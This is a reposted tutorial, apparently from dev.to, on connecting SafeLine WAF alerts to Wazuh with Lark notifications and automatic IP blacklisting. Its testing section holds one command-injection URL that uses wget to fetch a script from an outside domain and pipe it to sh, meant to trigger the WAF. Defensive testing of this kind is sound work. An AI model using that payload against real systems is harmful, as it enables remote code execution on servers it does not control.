Lädt...


🔧 Integrating Open Source WAF with Wazuh (Part 3)


Nachrichtenbereich: 🔧 Programmierung
🔗 Quelle: dev.to

This article is written by a SafeLine WAF user, 曼联小胖子

Part 1 is here.
Part 2 is here.

Wazuh Agent Configuration

  1. Log in to the Safeline WAF server and configure ossec to monitor the waf_alert.log file:
vim /var/ossec/etc/ossec.conf

Add the following configuration:

<localfile>
    <log_format>syslog</log_format>
    <location>/var/log/waf_alert/waf_alert.log</location>
</localfile>

It should be like the image below.

Image description

  1. Restart Wazuh Agent to Apply Configuration
systemctl restart wazuh-agent

Testing the Setup

Conduct a vulnerability scan on the website or input attack test statements to trigger alerts and check the interception results. For example:

https://a.test.com/view.php?doc=11.jpg&format=swf&isSplit=true&page=||wget http://spotslfy.com/wget.sh -O-|sh

Lark Alert Card

The Lark alert card will display clear messages that all relevant personnel in the group can see.

Image description

Safeline WAF IP Blacklist

You can see the attacking source IP, such as 47.1.1.1, automatically added to the blacklist.

Image description

When the attacker tries to access the website again, they will be blocked.

Image description

Checking the Number of Blacklisted IPs

To count the total number of blacklisted IPs, check the log:

cat /var/log/waf/block_ip.log

Image description

Further Ideas

Due to limited personal resources, there are two additional ideas regarding Lark alerts that I haven’t implemented. If you’re interested and have the development skills, feel free to explore further:

  1. Avoiding False IP Bans: To avoid mistakenly banning IPs, you could add two interactive buttons to the Feishu card message: “Confirm IP Ban” and “Ignore.” Clicking “Confirm IP Ban” would trigger the IP ban and simultaneously send a notification to the group with the handling result.

2.Alert Data Analysis: Currently, alert information pushed to the Feishu group cannot be statistically analyzed. Feishu multi-dimensional tables have basic Excel capabilities and powerful automation processes. With well-designed table fields, automation configurations, and API development, it can serve as a low-cost security data center and SOAR. For example, it could periodically push security weekly reports to the Feishu security workgroup, periodically summarize malicious IP lists, and push them to security devices.

That's the end.

...

🔧 Integrating Open Source WAF with Wazuh (Part 3)


📈 60.13 Punkte
🔧 Programmierung

🔧 Integrating Open Source WAF with Wazuh(Part 2)


📈 60.13 Punkte
🔧 Programmierung

🔧 AWS WAF vs. open-appsec ML-Based open source WAF


📈 38.04 Punkte
🔧 Programmierung

🎥 Integrating Suricata With Wazuh For Log Processing


📈 32.92 Punkte
🎥 IT Security Video

📰 heise+ | Wazuh: Unternehmenssicherheit mit Open Source gewährleisten


📈 29.53 Punkte
📰 IT Nachrichten

📰 Wazuh: Unternehmenssicherheit mit Open Source gewährleisten | heise online


📈 29.53 Punkte
📰 IT Security Nachrichten

📰 Wazuh: Building robust cybersecurity architecture with open source tools


📈 29.53 Punkte
📰 IT Security Nachrichten

📰 Wazuh: Free and open-source XDR and SIEM


📈 29.53 Punkte
📰 IT Security Nachrichten

📰 Protecting your business with Wazuh: The open source security platform


📈 29.53 Punkte
📰 IT Security Nachrichten

📰 Securing cloud workloads with Wazuh - an open source, SIEM and XDR platform


📈 29.53 Punkte
📰 IT Security Nachrichten

📰 Wazuh - The free and open source XDR platform


📈 29.53 Punkte
📰 IT Security Nachrichten

📰 Improve your security posture with Wazuh, a free and open source XDR


📈 29.53 Punkte
📰 IT Security Nachrichten

🐧 How to Enable Vulnerability Detection for Linux on Wazuh Open-Source SEIM


📈 29.53 Punkte
🐧 Linux Tipps

🔧 Open Source is More Secure than Closed Source because Closed Source is More Secure than Open Source


📈 27.03 Punkte
🔧 Programmierung

🔧 OPEN API Usage Tutorial for Open Source WAF SafeLine


📈 25.4 Punkte
🔧 Programmierung

🔧 Differences between SafeLine WAF Free and SafeLine WAF Pro


📈 25.27 Punkte
🔧 Programmierung

🔧 Achieving Multi-WAF Protection and Failover Using SafeLine WAF


📈 25.27 Punkte
🔧 Programmierung

🔧 Common WAF Deployment Modes and Free WAF Recommendation


📈 25.27 Punkte
🔧 Programmierung

📰 Waf-Bypass - Check Your WAF Before An Attacker Does


📈 25.27 Punkte
📰 IT Security Nachrichten

📰 DevOps didn’t kill WAF, because WAF will never truly die


📈 25.27 Punkte
📰 IT Security Nachrichten

📰 Why Replace Traditional Web Application Firewall (WAF) With New Age WAF?


📈 25.27 Punkte
📰 IT Security Nachrichten

🕵️ What is a Web Application Firewall (WAF)? Different Types of WAF


📈 25.27 Punkte
🕵️ Hacking

📰 WAF Buster - Disrupt WAF By Abusing SSL/TLS Ciphers


📈 25.27 Punkte
📰 IT Security Nachrichten

🔧 Shielding Your Apps in the Cloud: Integrating CloudFront and AWS WAF with Terraform


📈 24.78 Punkte
🔧 Programmierung

🔧 The Ultimate beginners guide to open source – part 2: ways to find open source projects to contribute to


📈 23.34 Punkte
🔧 Programmierung

🔧 The Ultimate beginners guide to open source – part 4: Why you should contribute to open source projects


📈 23.34 Punkte
🔧 Programmierung

🔧 Protect Your Site from Hackers with SafeLine: A Free and Open-Source WAF


📈 21.4 Punkte
🔧 Programmierung

matomo